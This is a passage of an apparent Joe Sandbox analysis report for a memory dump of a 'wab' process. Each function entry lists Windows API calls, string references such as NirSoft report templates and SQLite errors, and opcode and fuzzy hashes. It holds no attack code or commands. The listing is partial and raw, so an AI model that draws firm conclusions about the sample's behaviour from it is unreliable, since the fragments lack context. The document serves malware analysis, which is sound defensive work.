                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                  • String ID: caption
                                                  • API String ID: 973020956-4135340389
                                                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf$wcscpy
                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                  • API String ID: 1283228442-2366825230
                                                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcschr.MSVCRT ref: 00413972
                                                  • wcscpy.MSVCRT ref: 00413982
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                  • wcscpy.MSVCRT ref: 004139D1
                                                  • wcscat.MSVCRT ref: 004139DC
                                                  • memset.MSVCRT ref: 004139B8
                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                  • memset.MSVCRT ref: 00413A00
                                                  • memcpy.MSVCRT ref: 00413A1B
                                                  • wcscat.MSVCRT ref: 00413A27
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                  • String ID: \systemroot
                                                  • API String ID: 4173585201-1821301763
                                                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy
                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                  • API String ID: 1284135714-318151290
                                                  • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                  • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 4066108131-3849865405
                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004082EF
                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                  • memset.MSVCRT ref: 00408362
                                                  • memset.MSVCRT ref: 00408377
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharMultiWide
                                                  • String ID:
                                                  • API String ID: 290601579-0
                                                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memchrmemset
                                                  • String ID: PD$PD
                                                  • API String ID: 1581201632-2312785699
                                                  • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                  • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                  • GetDC.USER32(00000000), ref: 00409F6E
                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                  • GetParent.USER32(?), ref: 00409FA5
                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                  • String ID:
                                                  • API String ID: 2163313125-0
                                                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$wcslen
                                                  • String ID:
                                                  • API String ID: 239872665-3916222277
                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                  • String ID: %s (%s)$YV@
                                                  • API String ID: 3979103747-598926743
                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                  • String ID: Unknown Error$netmsg.dll
                                                  • API String ID: 2767993716-572158859
                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • wcscpy.MSVCRT ref: 0040DAFB
                                                  • wcscpy.MSVCRT ref: 0040DB0B
                                                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                  • API String ID: 3176057301-2039793938
                                                  • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                  • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                  • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                  • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                  • database %s is already in use, xrefs: 0042F6C5
                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                  • database is already attached, xrefs: 0042F721
                                                  • out of memory, xrefs: 0042F865
                                                  • unable to open database: %s, xrefs: 0042F84E
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                  • API String ID: 1297977491-2001300268
                                                  • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                  • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                  • memcpy.MSVCRT ref: 0040EB80
                                                  • memcpy.MSVCRT ref: 0040EB94
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                  • String ID: ($d
                                                  • API String ID: 1140211610-1915259565
                                                  • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                  • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                  • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                  • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                  • String ID:
                                                  • API String ID: 3015003838-0
                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00407E44
                                                  • memset.MSVCRT ref: 00407E5B
                                                  • _mbscpy.MSVCRT ref: 00407E7E
                                                  • _mbscpy.MSVCRT ref: 00407ED7
                                                  • _mbscpy.MSVCRT ref: 00407EEE
                                                  • _mbscpy.MSVCRT ref: 00407F01
                                                  • wcscpy.MSVCRT ref: 00407F10
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                  • String ID:
                                                  • API String ID: 59245283-0
                                                  • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                  • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                  • String ID:
                                                  • API String ID: 3467550082-0
                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                  • API String ID: 3510742995-3273207271
                                                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                  • memset.MSVCRT ref: 00413ADC
                                                  • memset.MSVCRT ref: 00413AEC
                                                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                  • memset.MSVCRT ref: 00413BD7
                                                  • wcscpy.MSVCRT ref: 00413BF8
                                                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                  • String ID: 3A
                                                  • API String ID: 3300951397-293699754
                                                  • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                  • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                  • String ID: strings
                                                  • API String ID: 3166385802-3030018805
                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00411AF6
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • wcsrchr.MSVCRT ref: 00411B14
                                                  • wcscat.MSVCRT ref: 00411B2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                  • String ID: AE$.cfg$General$EA
                                                  • API String ID: 776488737-1622828088
                                                  • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                  • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
